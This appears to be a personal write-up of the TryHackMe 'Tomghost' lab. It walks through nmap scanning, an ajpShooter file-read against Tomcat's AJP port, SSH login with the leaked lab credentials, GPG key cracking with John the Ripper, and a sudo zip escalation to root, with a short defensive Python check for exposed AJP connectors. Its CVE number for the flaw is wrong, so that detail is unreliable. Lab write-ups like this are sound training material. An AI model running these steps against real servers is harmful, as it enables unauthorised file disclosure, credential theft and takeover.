THM Tomghost room


This room was fun and one of the easier ones once I found some tooling on GitHub. I like that they have rooms related to the CVEs that are published and give you some experience with them. Well, enough with the intro; time to get to it.

The first thing that I always do is run an nmap scan. The one that I usually do first is nmap -p- IP_ADDRESS to get a list of all the ports that are open. Once I have that list to narrow things down, I do a more focused scan against those ports to get versions and run the default scripts. That command looks like nmap -p PORTS -sC -sV -oA server IP_ADDRESS. The output is in the next section below.

Enumeration

NMAP

Nmap scan report for 10.10.69.119
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I can see that a port that is not usually open, 8009, has a service of Apache Jserv running. I don't know what that is, so it's off to Google to see what we can come up with. While I am doing that I run gobuster against port 8080 to see if there are any pages of interest; the results are below.

Gobuster

/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/] 

Research

This is an Apache Tomcat server and the version that it's running (9.0.30) is related to CVE-2020-10487. I searched GitHub and came across this tool by 00theway, which seemed to give me what I needed. The following is the command I used to see what output I would get from the server.

python ajpShooter.py http://10.10.106.104:8080 8009 /WEB-INF/web.xml read

I got a good response and the following credentials were found.

- Username: skyfuck
- Password: 8730281lkjlkjdqlksalks
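As an added illustration from the defender's side (not part of the original writeup and not the tool's code), the following Python checks a Tomcat server.xml for the AJP connector configuration that leaves port 8009 reachable the way it was here. The two server.xml strings are constructed samples; the attribute names used (address, secretRequired, secret) are the real Tomcat connector attributes.

```python
"""Flag Tomcat AJP connectors (the 8009 service in the nmap scan above)
that are bound to all interfaces or have no shared secret configured."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def ajp_findings(server_xml: str) -> list[str]:
    """Return one finding per weakness in each AJP connector of a server.xml."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if "AJP" not in conn.get("protocol", "").upper():
            continue  # HTTP connectors are out of scope here
        port = conn.get("port", "?")
        addr = conn.get("address")  # absent means Tomcat binds every interface
        if addr is None or addr not in LOOPBACK:
            findings.append(f"AJP/{port}: listening on {addr or 'all interfaces'}; "
                            "bind it to 127.0.0.1 or remove the connector")
        if not conn.get("secret"):  # secret/secretRequired exist from 9.0.31 on
            findings.append(f"AJP/{port}: no shared secret; set secretRequired=\"true\" "
                            "and a secret, which needs Tomcat 9.0.31 or later")
    return findings


# Constructed sample: the pre-9.0.31 default, an AJP connector with no
# address and no secret, as on the 9.0.30 box in this room.
WEAK_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

# Constructed sample: loopback-only and secret-protected.
HARDENED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="REPLACE-WITH-A-RANDOM-SECRET"/>
</Service></Server>"""

if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, ajp_findings(xml) or "no AJP findings")
```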

Exploit

Time to see what we can do with the credentials that we found. Let's see if ssh works with the username and password found above. I am in luck: I am now on the box as skyfuck. As always, the next thing to do is list the contents of the directory I am in, and I see that we have a private key and an encrypted message.

The next step is to download those items to my VM. To do that I use scp to copy them with the following command:

scp skyfuck@IPADDRESS:/home/skyfuck/* .

After getting the items on the VM I try to import the private key and I can't because I don't have the password.

Time to convert the key to a format that John the Ripper can read. Since I can't remember where the file is located on my machine, locate gpg2john will find it. Once the program is found, the next thing to do is use it to convert the file: ./gpg2john private_key > key.hash, and then john --wordlist=~/CTF/words/pass.txt key.hash.

Here is the output of what JtR tells me.

Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2022-04-23 17:10) 5.555g/s 63288p/s 63288c/s 63288C/s alexander..amaleta
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now I have the passphrase I need to import the private key and then decrypt the encrypted message.

gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

I now have a different user and password to use, so I switch to that user and see what that user can do. I see the user flag file in Merlin's home folder, so let's submit that before I forget.

Now that I am Merlin, I run sudo -l to see what Merlin can do as a super user. I see that Merlin can run zip as a super user. With that information it's off to GTFOBins to see how that can be used to get the root.txt flag.

Using the command given on that website I can now elevate to the root user, view the root.txt file, and the room is complete.

As always, if you have questions or feedback about anything I say please email me.